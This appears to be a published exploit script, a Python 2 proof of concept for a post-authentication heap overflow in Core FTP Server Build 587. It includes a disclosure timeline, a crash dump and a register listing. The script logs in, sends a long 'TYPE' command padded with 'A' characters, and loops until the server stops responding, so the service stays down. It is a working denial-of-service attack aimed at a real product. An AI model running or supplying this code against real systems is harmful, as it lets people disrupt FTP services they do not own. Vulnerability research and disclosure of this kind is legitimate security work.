扫码分享
验证:
体验盒子# -*- coding: cp1252 -*-
# Exploit Title: Core FTP Server 32-bit - Build 587 Heap Overflow
# Date: 05/10/2016
# Exploit Author: Paul Purcell
# Contact: ptpxploit at gmail
# Vendor Homepage: http://www.coreftp.com/
# Vulnerable Version Download:http://coreftp.com/server/download/archive/CoreFTPServer587.exe
# Version: Core FTP Server 32-bit - Build 587 32-bit
# Tested on: Windows XP SP3 x32 English, Windows 7 Pro x64 SP1 English, Windows 10 Pro x64 English
# Category: Remote Heap Overflow PoC
#
# Timeline: 03/03/16 Bug found
# 03/04/16 Vender notified
# 03/06/16 Vender replied acknowledging the issue
# 04/07/16 Vender releases Build 588 which fixes the issue.
# 05/10/16 Exploit Released
#
# Summary:This exploit allows for a post authentication DOS.The server does not do proper bounds checking on
# server responses.In this case, the long 'MODE set to ...' reply invoked by a long TYPE command
# causes a heap overflow and crashes the server process.
#
# Crash info:
#
# 0133FA2C32 30 30 20 4D 4F 44 45200 MODE
# 0133FA3420 73 65 74 20 74 6F 20 set to
# 0133FA3C41 41 41 41 41 41 41 41AAAAAAAA
# 0133FA4441 41 41 41 41 41 41 41AAAAAAAA
# 0133FA4C41 41 41 41 41 41 41 41AAAAAAAA
# 0133FA5441 41 41 41 41 41 41 41AAAAAAAA
# 0133FA5C41 41 41 41 41 41 41 41AAAAAAAA
# 0133FA6441 41 41 41 41 41 41 41AAAAAAAA
# 0133FA6C41 41 41 41 41 41 41 41AAAAAAAA
# 0133FA7441 41 41 41 41 41 41 41AAAAAAAA
# 0133FA7C41 41 41 41 41 41 41 41AAAAAAAA
# 0133FA8441 41 41 41 41 41 41 41AAAAAAAA
# 0133FA8C41 41 41 41 41 41 41 41AAAAAAAA
# 0133FA9441 41 41 41 41 41 41 41AAAAAAAA
# 0133FA9C41 41 41 41 41 41 41 41AAAAAAAA
# 0133FAA441 41 41 41 41 41 41 41AAAAAAAA
# 0133FAAC41 41 41 41 41 41 41 41AAAAAAAA
# 0133FAB441 41 41 41 41 41 41 41AAAAAAAA
# 0133FABC41 41 41 41 41 41 41 41AAAAAAAA
# 0133FAC441 41 41 41 41 41 41 41AAAAAAAA
# 0133FACC41 41 41 41 41 41 41 41AAAAAAAA
# 0133FAD441 41 41 41 41 41 41 41AAAAAAAA
# 0133FADC41 41 41 41 41 41 41 41AAAAAAAA
# 0133FAE441 41 41 41 41 41 41 41AAAAAAAA
# 0133FAEC41 41 41 41 41 41 41 41AAAAAAAA
# 0133FAF441 41 41 41 41 41 41 41AAAAAAAA
# 0133FAFC41 41 41 41 41 41 41 41AAAAAAAA
# 0133FB0441 41 41 41 41 41 41 41AAAAAAAA
# 0133FB0C58 02 00 00 8E EB 31 57X..Žë1W
#
# 00439827 . 8B86 3C040000MOV EAX,DWORD PTR DS:[ESI+43C] ;ESI invalid address: DS:[4141457D]=???
# 0043982D . 85C0 TEST EAX,EAX
#
# DS:[4141457D]=???
# EAX=00000000
#
# EAX 00000000
# ECX 00000000
# EDX 00000001
# EBX 01141B90
# ESP 0142C06C
# EBP 0143FB3C
# ESI 41414141
# EDI 00000000
# EIP 00439827 coresrvr.00439827
# C 1ES 0023 32bit 0(FFFFFFFF)
# P 1CS 001B 32bit 0(FFFFFFFF)
# A 1SS 0023 32bit 0(FFFFFFFF)
# Z 0DS 0023 32bit 0(FFFFFFFF)
# S 1FS 003B 32bit 7FFD8000(FFF)
# T 1GS 0000 NULL
# D 0
# O 0LastErr ERROR_SUCCESS (00000000)
# EFL 00000397 (NO,B,NE,BE,S,PE,L,LE)
# ST0 empty
# ST1 empty
# ST2 empty
# ST3 empty
# ST4 empty
# ST5 empty
# ST6 empty
# ST7 empty
#3 2 1 0E S P U O Z D I
# FST 0000Cond 0 0 0 0Err 0 0 0 0 0 0 0 0(GT)
# FCW 027FPrec NEAR,53Mask1 1 1 1 1 1
import time
import socket
from ftplib import FTP
host='yourhost' #host or IP
port=21 #port
u="youruser"#username
p="yourpass"#password
pause=3 #pause between login & command attempts, normally 3 seconds is plenty of time.
command="TYPE "
evil="A"*211#Any more, and the program warns of buffer overflow attempt and ignores the command
evilTYPE=(command+evil) #Evil type command
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
open = sock.connect_ex((host,port))
sock.close()
if (open == 0):
print "FTP is up, lets fix that..."
while (open != 10061):
print "Connecting to send evil TYPE command..."
ftp = FTP()
ftp.connect(host,port)
ftp.login(u,p)
ftp.sendcmd(evilTYPE)
ftp.close()
time.sleep(pause)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
open = sock.connect_ex((host,port))
sock.close()
print "No more files for you!"
else:
print "Port "+str(port)+" does not seem to be open on "+host
体验盒子
